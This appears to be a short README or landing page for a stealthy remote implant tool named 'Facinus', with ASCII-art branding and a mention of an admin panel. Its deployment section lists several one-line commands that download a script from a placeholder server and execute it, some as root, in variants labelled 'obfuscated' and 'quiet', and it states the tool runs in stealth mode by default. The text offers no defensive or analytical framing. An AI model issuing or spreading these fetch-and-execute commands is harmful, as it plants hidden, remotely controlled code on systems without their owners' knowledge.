____  __    ___  __  __ _  _  _  ____ 
(  __)/ _\  / __)(  )(  ( \/ )( \/ ___)
 ) _)/    \( (__  )( /    /) \/ (\___ \
(__) \_/\_/ \___)(__)\_)__)\____/(____/

                                        

> deployment

eval "$(wget -qO- http://SERVER_IP/deployment/y)"
requires root access. runs in stealth mode by default.

> options

> no root
eval "$(wget -qO- http://SERVER_IP/deployment/minimal)"
> obfuscated
eval "$(wget -qO- http://SERVER_IP/deployment/x)"
> quiet
eval "$(wget -qO- http://SERVER_IP/deployment/quiet)"

> admin

$ access admin panel